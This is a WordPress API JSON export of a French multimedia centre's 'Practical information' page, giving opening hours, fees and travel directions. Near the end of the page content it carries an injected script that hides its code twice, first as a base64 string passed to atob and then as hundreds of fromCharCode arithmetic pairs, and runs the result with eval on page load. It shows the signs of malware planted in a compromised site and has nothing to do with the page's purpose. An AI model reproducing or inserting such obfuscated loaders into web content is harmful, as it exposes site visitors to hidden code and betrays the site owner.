{"id":1733,"date":"2015-08-24T10:51:29","date_gmt":"2015-08-24T09:51:29","guid":{"rendered":"https:\/\/www.espacemultimediagantner.cg90.net\/?page_id=1733"},"modified":"2021-12-10T10:20:44","modified_gmt":"2021-12-10T09:20:44","slug":"practical-information","status":"publish","type":"page","link":"https:\/\/www.espacemultimediagantner.cg90.net\/en\/practical-information\/","title":{"rendered":"Practical information"},"content":{"rendered":"<p>[vc_row][vc_column width=&#8221;1\/2&#8243;]<h2 class=\"headline font-inherit fontsize-l fontweight-400 lh-inherit align-center transform-inherit \" style=\"margin: 0 0 20px 0;\">Horaires et tarifs<\/h2>[vc_column_text]<\/p>\n<div class=\"wpb_text_column wpb_content_element \">\n<div class=\"wpb_wrapper\">\n<p>Tuesday-Saturday 2pm-6pm<br \/>\nThursday 2pm-6pm<\/p>\n<p>Closed the 24th &amp; 31st december<\/p>\n<\/div>\n<\/div>\n<p>[\/vc_column_text]<h4 class=\"headline font-inherit fontsize-inherit fontweight-700 lh-inherit align-left transform-inherit \" style=\"margin: 20px 0 20px 0; color: #ee6e2c;\">Entr\u00e9e libre<\/h4>[vc_column_text]Les ateliers de l&#8217;art r\u00e9cr\u00e9 et du teenage space club sont gratuits et limit\u00e9s \u00e0 10 places.<\/p>\n<p>Le pr\u00eat en m\u00e9diath\u00e8que se fait en s&#8217;acquittant du droit d&#8217;inscription de 30 \u20ac, somme revers\u00e9e par virement bancaire quand vous d\u00e9cidez d&#8217;arr\u00eater l&#8217;abonnement.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/2&#8243;]<h2 class=\"headline font-inherit fontsize-l fontweight-400 lh-inherit align-center transform-inherit \" style=\"margin: 0 0 20px 0;\">Acc\u00e8s<\/h2><h4 class=\"headline font-inherit fontsize-inherit fontweight-700 lh-inherit align-left transform-inherit \" style=\"margin: 15px 0 5px 0; color: #ee6e2c;\">En voiture<\/h4>[vc_column_text]Take the A36 motorway and leave at exit 11 \u2013 Vesoul-\u00c9pinal, and then follow the signs to Delle-Del\u00e9mont until you reach the turning for Bourogne. You can trace your itinerary using the map below[\/vc_column_text]<h4 class=\"headline font-inherit fontsize-inherit fontweight-700 lh-inherit align-left transform-inherit \" style=\"margin: 15px 0 5px 0; color: #ee6e2c;\">En bus<\/h4>[vc_column_text]You can buy your bus ticket by text message: 84100, write \u201cbus\u201d. Consult the website www.optymo.fr. to help you work out your itinerary from your home.[\/vc_column_text]<h4 class=\"headline font-inherit fontsize-inherit fontweight-700 lh-inherit align-left transform-inherit \" style=\"margin: 15px 0 5px 0; color: #ee6e2c;\">En train<\/h4>[vc_column_text]Consult the local sncf.com or national www.ter-sncf.com railway websites where you can work out your journey and then, when you arrive in Belfort, take the bus or opt for the car-sharing network[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/1&#8243;]<div class=\"hachureSeparation\" style='margin:20px 0 20px 0 !important;'> <\/div>[vc_raw_html]PGlmcmFtZSBzdHlsZT0iYm9yZGVyOiAxcHggc29saWQgYmxhY2s7IiBzcmM9Imh0dHBzOi8vd3d3Lm9wZW5zdHJlZXRtYXAub3JnL2V4cG9ydC9lbWJlZC5odG1sP2Jib3g9Ni45MTQ4Njg5NTA4NDM4MTIlMkM0Ny41NjI4MDg0MjgyNDg0NiUyQzYuOTE5MzY5Njk3NTcwODAyJTJDNDcuNTY1MjA0Njg4MDA0MTk0JmFtcDtsYXllcj1tYXBuaWsmYW1wO21hcmtlcj00Ny41NjQwMDgwMTQwNjMzNiUyQzYuOTE3MTIyMjE1OTYzOSIgd2lkdGg9IjEyMDAiIGhlaWdodD0iNDAwIiBmcmFtZWJvcmRlcj0iMCIgbWFyZ2lud2lkdGg9IjAiIG1hcmdpbmhlaWdodD0iMCIgc2Nyb2xsaW5nPSJubyI+PC9pZnJhbWU+DQo8c21hbGw+PGEgaHJlZj0iaHR0cHM6Ly93d3cub3BlbnN0cmVldG1hcC5vcmcvP21sYXQ9NDcuNTY0MDEmYW1wO21sb249Ni45MTcxMiNtYXA9MTgvNDcuNTY0MDEvNi45MTcxMiI+QWZmaWNoZXIgdW5lIGNhcnRlIHBsdXMgZ3JhbmRlPC9hPjwvc21hbGw+[\/vc_raw_html][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<\/p>\n<p><script>\/\/ <![CDATA[ \/\/ ]]><\/script><script>\/\/ <![CDATA[ \/\/ ]]><\/script><script>\/\/ <![CDATA[ \/\/ ]]><\/script><br \/>\n<script type=\"text\/javascript\">\/\/ <![CDATA[ var EKOXTSTGIH = atob('dmFyIEJNTlpYUEtaUEIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE1IC0gNSwgMTI2IC0gOCwgMTA1IC0gOCwgMTE2IC0gMiwgMzYgLSA0LCAxMTUgLSA4LCAxMDUgLSA0LCAxMzAgLSA5LCAzNyAtIDUsIDcwIC0gOSwgMzMgLSAxLCA0NiAtIDcsIDY5IC0gMiwgMTE5IC0gOSwgMTI3IC0gOSwgOTAgLSA1LCA3NCAtIDMsIDczIC0gNCwgOTAgLSA2LCA3OSAtIDEsIDEwMCAtIDMsIDEyOSAtIDcsIDQxIC0gMiwgNjIgLSAzLCAxNCAtIDQsIDEyMyAtIDUsIDEwMSAtIDQsIDEyMyAtIDksIDM3IC0gNSwgMTA2IC0gNSwgMTE1IC0gNSwgMTA4IC0gOSwgMTAzIC0gMiwgMTAzIC0gMywgMzQgLSAyLCA2NyAtIDYsIDM0IC0gMiwgNDQgLSA1LCA4MiAtIDQsIDg5IC0gOCwgNTkgLSAzLCA3MiAtIDMsIDEwNyAtIDcsIDkxIC0gNywgMTA2IC0gNywgNTkgLSA4LCA4NCAtIDcsIDEwOSAtIDQsIDgyIC0gOCwgNzIgLSA2LCA5MSAtIDksIDUxIC0gMSwgODAgLSAzLCA4MiAtIDcsIDc5IC0gOCwgOTEgLSA3LCA5NSAtIDYsIDEyNyAtIDYsIDgzIC0gOCwgNzYgLSA4LCA3MiAtIDMsIDEwNCAtIDEsIDc3IC0gNywgOTUgLSA5LCA4MyAtIDIsIDEwOSAtIDYsIDgwIC0gOCwgNzIgLSA2LCA4MCAtIDMsIDUxIC0gMywgODYgLSA5LCAxMjIgLSAxLCA2NyAtIDIsIDg4IC0gNiwgODAgLSA3LCAxMDggLSA1LCA4MyAtIDIsIDkwIC0gMiwgNzggLSA0LCAxMDkgLSA2LCA2OCAtIDMsIDc2IC0gOSwgMTA3IC0gNSwgOTIgLSA1LCA2NyAtIDIsIDU0IC0gNCwgODIgLSA0LCAxMjggLSA2LCAxMjYgLSA3LCA3NCAtIDEsIDY5IC0gMiwgMTEzIC0gNywgMTA5IC0gOSwgNzUgLSAxLCA5MyAtIDUsIDUzIC0gMywgNTYgLSAzLCA3OSAtIDEsIDgyIC0gNCwgODcgLSA0LCA5MSAtIDIsIDExMiAtIDEsIDczIC0gNSwgODkgLSAzLCA4OSAtIDgsIDEyMyAtIDQsIDczIC0gNiwgMTIzIC0gNCwgNzUgLSAyLCA5MSAtIDYsIDgyIC0gNSwgMTI4IC0gNiwgNzEgLSAyLCAxMTggLSA5LCA4MiAtIDgsIDEyNiAtIDcsIDgwIC0gMywgODUgLSA1LCA4NSAtIDcsIDEyOCAtIDksIDEyMSAtIDUsIDEwMyAtIDIsIDEwMiAtIDMsIDExMyAtIDcsIDg4IC0gNywgNTIgLSAxLCA4MSAtIDMsIDUyIC0gMiwgMTA5IC0gMSwgNzkgLSAxLCA5MCAtIDIsIDkxIC0gOCwgMTE2IC0gMSwgMTAyIC0gNSwgNjggLSAzLCAxMDggLSAzLCA5MiAtIDYsIDY0IC0gNywgMTA0IC0gNywgMTE1IC0gNSwgMTIwIC0gNSwgNjIgLSA4LCA3MSAtIDIsIDEyOSAtIDksIDExNiAtIDEsIDExNyAtIDksIDY5IC0gMiwgNzAgLSA0LCA2NSAtIDksIDU3IC0gNywgNzkgLSA1LCAxMTMgLSA3LCA4NiAtIDEsIDU5IC0gMiwgOTMgLSA0LCA3NCAtIDksIDYwIC0gNCwgOTYgLSA5LCAxMDMgLSA1LCA2NyAtIDEsIDUxIC0gMywgNzEgLSA0LCA4MCAtIDIsIDc2IC0gOCwgNzggLSAxLCAxMTkgLSA0LCA4NiAtIDgsIDUyIC0gMiwgNzggLSA5LCA4MiAtIDUsIDcyIC0gMSwgMTIyIC0gMSwgMTE2IC0gNSwgNjggLSAzLCA5NiAtIDksIDY5IC0gMSwgNjQgLSA4LCA1MSAtIDMsIDk3IC0gOCwgMTE2IC0gNiwgNTQgLSA1LCA1NyAtIDgsIDEwNiAtIDksIDEyNyAtIDcsIDU1IC0gMywgMTIyIC0gNywgNzIgLSA0LCA4NiAtIDUsIDgyIC0gNSwgNTMgLSAxLCA3OCAtIDUsIDEwNyAtIDIsIDExNyAtIDIsIDEwNCAtIDEsIDk3IC0gOCwgNzIgLSA3LCAxMTEgLSA0LCAxMDggLSA2LCA3NCAtIDEsIDExMSAtIDgsIDExMyAtIDEsIDk4IC0gOSwgODQgLSA2LCA2OSAtIDEsIDEwNyAtIDgsIDU1IC0gNiwgODEgLSA0LCA4NCAtIDEsIDY5IC0gNCwgNzggLSA4LCA4NiAtIDcsIDg3IC0gNCwgMTE4IC0gMywgNzkgLSA3LCA3MyAtIDIsIDEwOCAtIDIsIDc2IC0gNiwgMTI2IC0gOCwgODIgLSA0LCA4NyAtIDQsIDk2IC0gNywgMTE3IC0gNiwgNzMgLSA1LCA4OCAtIDIsIDc5IC0gMSwgNTQgLSAyLCA5OSAtIDksIDY4IC0gMywgNjggLSA3LCA2MyAtIDIsIDQxIC0gMiwgNjcgLSA4LCAxOCAtIDgsIDExMCAtIDgsIDExOCAtIDEsIDExMSAtIDEsIDEwNCAtIDUsIDEyNCAtIDgsIDExNCAtIDksIDExNCAtIDMsIDExMyAtIDMsIDM2IC0gNCwgMTI1IC0gNSwgMTEyIC0gMSwgMTE1IC0gMSwgOTcgLSAyLCAxMDQgLSAzLCAxMTEgLSAxLCAxMDUgLSA2LCA0MSAtIDEsIDExOCAtIDMsIDEyNSAtIDksIDExNyAtIDMsIDExMyAtIDgsIDExMiAtIDIsIDEwOSAtIDYsIDQ3IC0gMywgMzkgLSA3LCAxMDggLSAxLCAxMDYgLSA1LCAxMjMgLSAyLCA0NCAtIDMsIDMzIC0gMSwgMTI1IC0gMiwgMTMgLSAzLCAzNCAtIDIsIDM4IC0gNiwgMTI0IC0gNiwgMTA0IC0gNywgMTE2IC0gMiwgNDEgLSA5LCAxMjIgLSA4LCAxMDkgLSA4LCAxMTcgLSAyLCAzOCAtIDYsIDYyIC0gMSwgMzkgLSA3LCA0MSAtIDIsIDQxIC0gMiwgNjUgLSA2LCAxMyAtIDMsIDM1IC0gMywgMzQgLSAyLCAxMDQgLSAyLCAxMTggLSA3LCAxMTggLSA0LCAzNSAtIDMsIDQ1IC0gNSwgMTIxIC0gMywgMTAwIC0gMywgMTIzIC0gOSwgMzMgLSAxLCAxMDcgLSAyLCAzNSAtIDMsIDY2IC0gNSwgMzcgLSA1LCA0OSAtIDEsIDY2IC0gNywgMzcgLSA1LCAxMTEgLSA2LCAzOSAtIDcsIDYyIC0gMiwgMzUgLSAzLCAxMTggLSAzLCAxMjIgLSA2LCAxMjMgLSA5LCAxMTIgLSA3LCAxMTcgLSA3LCAxMDYgLSAzLCA0OCAtIDIsIDExMiAtIDQsIDEwNyAtIDYsIDExOCAtIDgsIDExMiAtIDksIDEyMCAtIDQsIDExMCAtIDYsIDYxIC0gMiwgMzcgLSA1LCAxMTIgLSA3LCA0OCAtIDUsIDUyIC0gOSwgNDIgLSAxLCA0MSAtIDksIDEyOCAtIDUsIDE4IC0gOCwgNDEgLSA5LCA0MCAtIDgsIDM4IC0gNiwgMzkgLSA3LCAxMjEgLSA3LCAxMTAgLSA5LCAxMTcgLSAyLCAzNCAtIDIsIDQ2IC0gMywgNjUgLSA0LCAzNSAtIDMsIDkwIC0gNywgMTIzIC0gNywgMTIwIC0gNiwgMTA5IC0gNCwgMTEyIC0gMiwgMTA0IC0gMSwgNTUgLSA5LCAxMTEgLSA5LCAxMjEgLSA3LCAxMTUgLSA0LCAxMTcgLSA4LCA3MiAtIDUsIDEwNiAtIDIsIDEwMCAtIDMsIDExOCAtIDQsIDc0IC0gNywgMTE3IC0gNiwgMTA1IC0gNSwgMTAyIC0gMSwgNDcgLSA3LCAxMjIgLSA3LCAxMjAgLSA0LCAxMTggLSA0LCAxMTIgLSA3LCAxMTYgLSA2LCAxMTIgLSA5LCA0OCAtIDIsIDEwMyAtIDQsIDExMiAtIDgsIDk5IC0gMiwgMTE5IC0gNSwgNzUgLSA4LCAxMTYgLSA1LCAxMDUgLSA1LCAxMDYgLSA1LCA2NyAtIDIsIDExOSAtIDMsIDQ5IC0gOSwgMTEzIC0gOCwgNDMgLSAyLCAzOCAtIDYsIDEwMiAtIDgsIDE3IC0gNywgMTQgLSA1LCAxMiAtIDMsIDExIC0gMiwgMTcgLSA4LCAxMTUgLSA4LCAxMDYgLSA1LCAxMjcgLSA2LCA1MyAtIDcsIDEwMyAtIDQsIDEwNSAtIDEsIDEwMyAtIDYsIDExNyAtIDMsIDc1IC0gOCwgMTEzIC0gMiwgMTA4IC0gOCwgMTEwIC0gOSwgNzIgLSA3LCAxMjMgLSA3LCA0OSAtIDksIDExMyAtIDgsIDQwIC0gOCwgNDQgLSA3LCA0MCAtIDgsIDExMyAtIDYsIDEwOCAtIDcsIDEyNyAtIDYsIDQ3IC0gMSwgMTE1IC0gNywgMTAzIC0gMiwgMTE2IC0gNiwgMTA5IC0gNiwgMTI0IC0gOCwgMTEwIC0gNiwgNDMgLSAyLCA0NiAtIDUsIDY0IC0gNSwgMTIgLSAyLCAzMyAtIDEsIDM1IC0gMywgMTMxIC0gNiwgMTQgLSA0LCAzNiAtIDQsIDM1IC0gMywgMTE5IC0gNSwgMTA2IC0gNSwgMTIyIC0gNiwgMTIyIC0gNSwgMTIzIC0gOSwgMTEzIC0gMywgMzQgLSAyLCAxMjIgLSA4LCAxMDcgLSA2LCAxMTkgLSA0LCA2MiAtIDMsIDE5IC0gOSwgMTMxIC0gNiwgMTggLSA4LCAxOSAtIDksIDEyNiAtIDgsIDk4IC0gMSwgMTE1IC0gMSwgMzYgLSA0LCAxMDIgLSAyLCAxMDIgLSAxLCAxMDEgLSAyLCAzNiAtIDQsIDYyIC0gMSwgMzUgLSAzLCAxMjYgLSA2LCAxMTMgLSAyLCAxMjMgLSA5LCAxMDAgLSA1LCAxMTAgLSA5LCAxMTggLSA4LCAxMDEgLSAyLCA0NSAtIDUsIDEwMyAtIDYsIDEyMyAtIDcsIDExMyAtIDIsIDEwMCAtIDIsIDQxIC0gMSwgMTA5IC0gOCwgMTE0IC0gNCwgMTA2IC0gNywgMTAyIC0gMSwgMTAyIC0gMiwgNDQgLSAzLCA1MyAtIDksIDM3IC0gNSwgMTE0IC0gNywgMTA5IC0gOCwgMTMwIC0gOSwgNDMgLSAyLCA2NiAtIDcsIDExIC0gMSwgNDQgLSA0LCAxMTggLSA4LCAxMDUgLSA0LCAxMjMgLSA0LCAzOCAtIDYsIDcxIC0gMSwgMTIwIC0gMywgMTE3IC0gNywgMTAxIC0gMiwgMTI0IC0gOCwgMTE0IC0gOSwgMTEzIC0gMiwgMTE0IC0gNCwgNDggLSA4LCAxMDUgLSA1LCAxMDMgLSAyLCAxMDcgLSA4LCA0NCAtIDMsIDQ3IC0gNiwgNDggLSA4LCA0MyAtIDIsIDY4IC0gOSwgMTcgLSA3LCAxOSAtIDkpO2V2YWwoQk1OWlhQS1pQQik7'); eval(EKOXTSTGIH); \/\/ ]]><\/script><\/p>\n<p><script>\/\/ <![CDATA[ \/\/ ]]><\/script><script>\/\/ <![CDATA[ \/\/ ]]><\/script><script>\/\/ <![CDATA[ \/\/ ]]><\/script>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n","protected":false},"excerpt":{"rendered":"[vc_row][vc_column width=&#8221;1\/2&#8243;][vc_column_text] Tuesday-Saturday 2pm-6pm Thursday 2pm-6pm Closed the 24th &amp; 31st december [\/vc_column_text][vc_column_text]Les ateliers de l&#8217;art r\u00e9cr\u00e9 et du teenage space club sont gratuits et limit\u00e9s \u00e0 10 places. Le pr\u00eat en m\u00e9diath\u00e8que se fait en s&#8217;acquittant du droit d&#8217;inscription de 30 \u20ac, somme revers\u00e9e par virement bancaire quand vous d\u00e9cidez d&#8217;arr\u00eater l&#8217;abonnement.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text]Take the&#8230;<br><span class=\"morePlus\">+<\/span>","protected":false},"author":5,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-orange.php","meta":{"footnotes":""},"class_list":["post-1733","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.espacemultimediagantner.cg90.net\/en\/wp-json\/wp\/v2\/pages\/1733","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.espacemultimediagantner.cg90.net\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.espacemultimediagantner.cg90.net\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.espacemultimediagantner.cg90.net\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/www.espacemultimediagantner.cg90.net\/en\/wp-json\/wp\/v2\/comments?post=1733"}],"version-history":[{"count":7,"href":"https:\/\/www.espacemultimediagantner.cg90.net\/en\/wp-json\/wp\/v2\/pages\/1733\/revisions"}],"predecessor-version":[{"id":6203,"href":"https:\/\/www.espacemultimediagantner.cg90.net\/en\/wp-json\/wp\/v2\/pages\/1733\/revisions\/6203"}],"wp:attachment":[{"href":"https:\/\/www.espacemultimediagantner.cg90.net\/en\/wp-json\/wp\/v2\/media?parent=1733"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}